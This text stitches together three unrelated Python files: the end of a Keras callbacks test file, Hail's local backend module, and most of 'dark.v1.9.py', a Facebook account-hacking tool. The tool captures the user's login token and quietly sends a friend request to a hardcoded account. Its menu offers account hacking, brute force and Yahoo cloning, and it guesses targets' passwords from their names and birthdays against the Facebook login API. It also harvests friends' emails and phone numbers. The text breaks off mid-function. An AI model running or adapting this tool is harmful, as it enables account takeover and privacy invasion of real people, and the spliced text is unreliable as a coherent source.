callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) # Enabled trace only on the 10000th batch, thus it should be empty. self.assertEmpty(summary_file.tensors) self.assertEqual(0, self._count_trace_file(logdir=self.train_dir)) class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase): def test_get_most_recently_modified_file_matching_pattern(self): file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5'] ] for file_path in file_paths: with open(file_path, 'w') as f: # Ensure there are some intervals between file creation. time.sleep(2) f.write('foo bar') # Ensure the files have been actually written. self.assertEqual( set([ os.path.join(test_dir, file_name) for file_name in os.listdir(test_dir) ]), set(file_paths)) self.assertEqual( keras.callbacks.ModelCheckpoint(None) ._get_most_recently_modified_file_matching_pattern(path_pattern), file_paths[-1]) def test_some_file_not_matching_pattern(self): file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5'] ] for file_path in file_paths: with open(file_path, 'w') as f: # Ensure there are some intervals between file creation. 
time.sleep(2) f.write('foo bar') self.assertEqual( keras.callbacks.ModelCheckpoint(None) ._get_most_recently_modified_file_matching_pattern(path_pattern), file_paths[-2]) def test_get_same_file_if_file_name_equals_pattern(self): file_name = 'f.batch02.h5' test_dir = self.get_temp_dir() file_path = os.path.join(test_dir, file_name) with open(file_path, 'w') as f: f.write('foo bar') self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path) self.assertEqual( keras.callbacks.ModelCheckpoint( None)._get_most_recently_modified_file_matching_pattern(file_path), file_path) def test_get_none_if_file_does_not_exist(self): file_name = 'f.batch02.h5' test_dir = self.get_temp_dir() file_path = os.path.join(test_dir, file_name) self.assertLen(os.listdir(test_dir), 0) self.assertEqual( keras.callbacks.ModelCheckpoint( None)._get_most_recently_modified_file_matching_pattern(file_path), None) def test_using_checkpoint_management_latest_checkpoint(self): file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}' ckpt_file_name = 'f.batchXepochY' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) ckpt_file_path = os.path.join(test_dir, ckpt_file_name) with open(ckpt_file_path, 'w') as f: f.write('dummy ckpt') tf.__internal__.train.update_checkpoint_state( test_dir, ckpt_file_path) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02', 'f.batch02epoch02'] ] for file_path in file_paths: with open(file_path, 'w') as f: f.write('foo bar') # The result returned from checkpoint_management.latest_checkpoint takes # priority, so even if it was written earlier, we should still return that. self.assertEqual( keras.callbacks.ModelCheckpoint(None) ._get_most_recently_modified_file_matching_pattern(path_pattern), ckpt_file_path) class SummaryOpsTest(tf.test.TestCase): def tearDown(self): super(SummaryOpsTest, self).tearDown() tf.summary.trace_off() def keras_model(self, *args, **kwargs): logdir = self.get_temp_dir() writer = tf.summary.create_file_writer(logdir) with writer.as_default(): keras.callbacks.keras_model_summary(*args, **kwargs) writer.close() events = events_from_logdir(logdir) # The first event contains no summary values. The written content goes to # the second event. return events[1] @test_utils.run_v2_only def testKerasModel(self): model = keras.Sequential( [Dense(10, input_shape=(100,)), Activation('relu', name='my_relu')]) event = self.keras_model(name='my_name', data=model, step=1) first_val = event.summary.value[0] self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode()) @test_utils.run_v2_only def testKerasModel_usesDefaultStep(self): model = keras.Sequential( [Dense(10, input_shape=(100,)), Activation('relu', name='my_relu')]) try: tf.summary.experimental.set_step(42) event = self.keras_model(name='my_name', data=model) self.assertEqual(42, event.step) finally: # Reset to default state for other tests. tf.summary.experimental.set_step(None) @test_utils.run_v2_only def testKerasModel_subclass(self): class SimpleSubclass(keras.Model): def __init__(self): super(SimpleSubclass, self).__init__(name='subclass') self.dense = Dense(10, input_shape=(100,)) self.activation = Activation('relu', name='my_relu') def call(self, inputs): x = self.dense(inputs) return self.activation(x) # Intentionally erroring out at json serialization to test the warning. 
def get_config(self): raise NotImplementedError model = SimpleSubclass() with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log: self.assertFalse( keras.callbacks.keras_model_summary( name='my_name', data=model, step=1)) self.assertRegex( str(mock_log.call_args), 'Model failed to serialize as JSON.') @test_utils.run_v2_only def testKerasModel_otherExceptions(self): model = keras.Sequential() with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json: with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log: mock_to_json.side_effect = Exception('oops') self.assertFalse( keras.callbacks.keras_model_summary( name='my_name', data=model, step=1)) self.assertRegex( str(mock_log.call_args), 'Model failed to serialize as JSON. Ignoring') def events_from_file(filepath): """Returns all events in a single event file. Args: filepath: Path to the event file. Returns: A list of all tf.Event protos in the event file. """ result = [] raw_dataset = tf.data.TFRecordDataset([filepath]) for raw_record in raw_dataset.take(10): event = tf.compat.v1.Event() event.ParseFromString(raw_record.numpy()) result.append(event) return result def events_from_logdir(logdir): """Returns all events in the single eventfile in logdir. Args: logdir: The directory in which the single event file is sought. Returns: A list of all tf.Event protos from the single event file. Raises: AssertionError: If logdir does not contain exactly one file. """ assert tf.compat.v1.gfile.Exists(logdir) files = tf.compat.v1.gfile.ListDirectory(logdir) assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files return events_from_file(os.path.join(logdir, files[0])) if __name__ == '__main__': tf.test.main()
local_backend.py
import json import os import socket import socketserver import sys from threading import Thread import pkg_resources import py4j from py4j.java_gateway import JavaGateway, GatewayParameters, launch_gateway from hail.expr.blockmatrix_type import tblockmatrix from hail.expr.matrix_type import tmatrix from hail.expr.table_type import ttable from hail.expr.types import dtype from hail.ir import JavaIR from hail.ir.renderer import CSERenderer from hail.utils.java import scala_package_object, scala_object from .py4j_backend import Py4JBackend, handle_java_exception from ..fs.local_fs import LocalFS from ..hail_logging import Logger from hailtop.utils import find_spark_home _installed = False _original = None def install_exception_handler(): global _installed global _original if not _installed: _original = py4j.protocol.get_return_value _installed = True # The original `get_return_value` is not patched, it's idempotent. patched = handle_java_exception(_original) # only patch the one used in py4j.java_gateway (call Java API) py4j.java_gateway.get_return_value = patched def uninstall_exception_handler(): global _installed global _original if _installed: _installed = False py4j.protocol.get_return_value = _original class LoggingTCPHandler(socketserver.StreamRequestHandler): def handle(self): for line in self.rfile: sys.stderr.write(line.decode("ISO-8859-1")) class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer): daemon_threads = True allow_reuse_address = True def __init__(self, server_address, handler_class): socketserver.TCPServer.__init__(self, server_address, handler_class) def connect_logger(utils_package_object, host, port): """ This method starts a simple server which listens on a port for a client to connect and start writing messages. Whenever a message is received, it is written to sys.stderr. The server is run in a daemon thread from the caller, which is killed when the caller thread dies. If the socket is in use, then the server tries to listen on the next port (port + 1). After 25 tries, it gives up. :param str host: Hostname for server. :param int port: Port to listen on. 
""" server = None tries = 0 max_tries = 25 while not server: try: server = SimpleServer((host, port), LoggingTCPHandler) except socket.error: port += 1 tries += 1 if tries >= max_tries: sys.stderr.write( 'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries)) return t = Thread(target=server.serve_forever, args=()) # The thread should be a daemon so that it shuts down when the parent thread is killed t.daemon = True t.start() utils_package_object.addSocketAppender(host, port) class Log4jLogger(Logger): def __init__(self, log_pkg): self._log_pkg = log_pkg def error(self, msg): self._log_pkg.error(msg) def warning(self, msg): self._log_pkg.warn(msg) def info(self, msg): self._log_pkg.info(msg) class LocalBackend(Py4JBackend): def __init__(self, tmpdir, log, quiet, append, branching_factor, skip_logging_configuration, optimizer_iterations): spark_home = find_spark_home() hail_jar_path = os.environ.get('HAIL_JAR') if hail_jar_path is None: if pkg_resources.resource_exists(__name__, "hail-all-spark.jar"): hail_jar_path = pkg_resources.resource_filename(__name__, "hail-all-spark.jar") else: raise RuntimeError('local backend requires a packaged jar or HAIL_JAR to be set') port = launch_gateway( redirect_stdout=sys.stdout, redirect_stderr=sys.stderr, jarpath=f'{spark_home}/jars/py4j-0.10.9.jar', classpath=f'{spark_home}/jars/*:{hail_jar_path}', die_on_exit=True) self._gateway = JavaGateway( gateway_parameters=GatewayParameters(port=port, auto_convert=True)) self._jvm = self._gateway.jvm hail_package = getattr(self._jvm, 'is').hail self._hail_package = hail_package self._utils_package_object = scala_package_object(hail_package.utils) self._jbackend = hail_package.backend.local.LocalBackend.apply(tmpdir) self._jhc = hail_package.HailContext.apply( self._jbackend, log, True, append, branching_factor, skip_logging_configuration, optimizer_iterations) # This has to go after creating the SparkSession. Unclear why. # Maybe it does its own patch? install_exception_handler() from hail.context import version py_version = version() jar_version = self._jhc.version() if jar_version != py_version: raise RuntimeError(f"Hail version mismatch between JAR and Python library\n" f" JAR: {jar_version}\n" f" Python: {py_version}") self._fs = LocalFS() self._logger = None if not quiet: connect_logger(self._utils_package_object, 'localhost', 12888) def jvm(self): return self._jvm def hail_package(self): return self._hail_package def utils_package_object(self): return self._utils_package_object def stop(self): self._jhc.stop() self._jhc = None # FIXME stop gateway? 
uninstall_exception_handler() def _parse_value_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_value_ir( code, {k: t._parsable_string() for k, t in ref_map.items()}, ir_map) def _parse_table_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_table_ir(code, ref_map, ir_map) def _parse_matrix_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_matrix_ir(code, ref_map, ir_map) def _parse_blockmatrix_ir(self, code, ref_map={}, ir_map={}): return self._jbackend.parse_blockmatrix_ir(code, ref_map, ir_map) @property def logger(self): if self._logger is None: self._logger = Log4jLogger(self._utils_package_object) return self._logger @property def fs(self): return self._fs def _to_java_ir(self, ir, parse): if not hasattr(ir, '_jir'): r = CSERenderer(stop_at_jir=True) # FIXME parse should be static ir._jir = parse(r(ir), ir_map=r.jirs) return ir._jir def _to_java_value_ir(self, ir): return self._to_java_ir(ir, self._parse_value_ir) def _to_java_table_ir(self, ir): return self._to_java_ir(ir, self._parse_table_ir) def _to_java_matrix_ir(self, ir): return self._to_java_ir(ir, self._parse_matrix_ir) def _to_java_blockmatrix_ir(self, ir): return self._to_java_ir(ir, self._parse_blockmatrix_ir) def value_type(self, ir): jir = self._to_java_value_ir(ir) return dtype(jir.typ().toString()) def table_type(self, tir): jir = self._to_java_table_ir(tir) return ttable._from_java(jir.typ()) def matrix_type(self, mir): jir = self._to_java_matrix_ir(mir) return tmatrix._from_java(jir.typ()) def blockmatrix_type(self, bmir): jir = self._to_java_blockmatrix_ir(bmir) return tblockmatrix._from_java(jir.typ()) def add_reference(self, config): self._hail_package.variant.ReferenceGenome.fromJSON(json.dumps(config)) def load_references_from_dataset(self, path): return json.loads(self._jbackend.pyLoadReferencesFromDataset(path)) def from_fasta_file(self, name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par): self._jbackend.pyFromFASTAFile( name, fasta_file, index_file, x_contigs, y_contigs, mt_contigs, par) def remove_reference(self, name): self._hail_package.variant.ReferenceGenome.removeReference(name) def get_reference(self, name): return json.loads(self._hail_package.variant.ReferenceGenome.getReference(name).toJSONString()) def add_sequence(self, name, fasta_file, index_file): self._jbackend.pyAddSequence(name, fasta_file, index_file) def remove_sequence(self, name): scala_object(self._hail_package.variant, 'ReferenceGenome').removeSequence(name) def add_liftover(self, name, chain_file, dest_reference_genome): self._jbackend.pyReferenceAddLiftover(name, chain_file, dest_reference_genome) def remove_liftover(self, name, dest_reference_genome): scala_object(self._hail_package.variant, 'ReferenceGenome').referenceRemoveLiftover( name, dest_reference_genome) def parse_vcf_metadata(self, path): return json.loads(self._jhc.pyParseVCFMetadataJSON(self.fs._jfs, path)) def index_bgen(self, files, index_file_map, rg, contig_recoding, skip_invalid_loci): self._jbackend.pyIndexBgen(files, index_file_map, rg, contig_recoding, skip_invalid_loci) def import_fam(self, path: str, quant_pheno: bool, delimiter: str, missing: str): return json.loads(self._jbackend.pyImportFam(path, quant_pheno, delimiter, missing)) def persist_ir(self, ir): return JavaIR(self._jhc.backend().executeLiteral(self._to_java_value_ir(ir)))
dark.v1.9.py
# -*- coding: utf-8 -*- import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool try: import mechanize except ImportError: os.system('pip2 install mechanize') else: try: import requests except ImportError: os.system('pip2 install requests') from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/7.6.40234/154.91; U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '[!] Tutup' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo = "\x1b[1;97m █████████\n \x1b[1;97m█▄█████▄█ \x1b[1;92m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n\x1b[1;97m █ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;34m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n\x1b[1;97m █ \x1b[1;97m_-_-- -_ --__ \x1b[1;34m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n\x1b[1;97m █ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;34m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mv1.9\n\x1b[1;97m █████████ \x1b[1;92m«==========✧==========»\n\x1b[1;97m ██ ██\n\x1b[1;34m ╔════════════════════════════════════════════════╗\n \x1b[1;34m║ \x1b[1;97m* \x1b[1;91mReCode \x1b[1;93m: \x1b[1;92m Mr.RLA 0712 \x1b[1;34m ║\n \x1b[1;34m║ \x1b[1;97m* \x1b[1;91mWhatsapp \x1b[1;93m: \x1b[1;92m \x1b[92m085788694152\x1b[ \x1b[1;34m ║\n \x1b[1;34m║ \x1b[1;97m* \x1b[1;91mFB \x1b[1;93m: \x1b[1;92\x1b[92mhttps://fb.me/GlovesRla\x1b[ \x1b[1;34m ║ \n \x1b[1;34m╚════════════════════════════════════════════════╝" '\n\x1b[1;93m[*] Tools DarkFB ReCode By Mr.RLA 0712\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o, sys.stdout.flush() time.sleep(0.01) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idfriends = [] idfromfriends = [] idmem = [] id = [] em = [] emfromfriends = [] hp = [] hpfromfriends = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] 
Tidak Ada Koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) time.sleep(1) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak Ada Koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint' os.system('rm -rf login.txt') time.sleep(0.01) keluar() else: print '\n\x1b[1;91m[!] Gagal Masuk' os.system('rm -rf login.txt') time.sleep(0.01) login() def menu(): try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket) b = json.loads(ots.text) sub = str(b['summary']['total_count']) except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(0.01) login() except requests.exceptions.ConnectionError: print logo print '\x1b[1;91m[!] Tidak Ada Koneksi' keluar() os.system('clear') print logo print '\x1b[1;93m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;93m ' + '║' print '\x1b[1;93m╠' + 50 * '\xe2\x95\x90' + '╝' print '║-> \x1b[1;93;40m1. User Information' print '║-> \x1b[1;93;40m2. Hack Facebook Account' print '║-> \x1b[1;93;40m3. Bot' print '║-> \x1b[1;93;40m4. Others' print '║-> \x1b[1;93;40m5. Update' print '║-> \x1b[1;93;40m6. Logout' print '║-> \x1b[1;93;40m0. Exit' print '\x1b[1;93;40m║' pilih() def pilih(): zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] 
Can\'t empty' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' os.system('git pull origin master') raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: if zedd == '6': os.system('rm -rf login.txt') os.system('xdg-open https://m.facebook.com/rizz.magizz') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel' pilih() def informasi(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 52 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mTidak Ada' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() def menu_hack(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m5. Yahoo Clone' print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' hack_pilih() def hack_pilih(): hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] 
Can\'t empty' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found' hack_pilih() def mini(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Target must be your friend !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...') time.sleep(1) jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...') time.sleep(1) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] 
\x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print 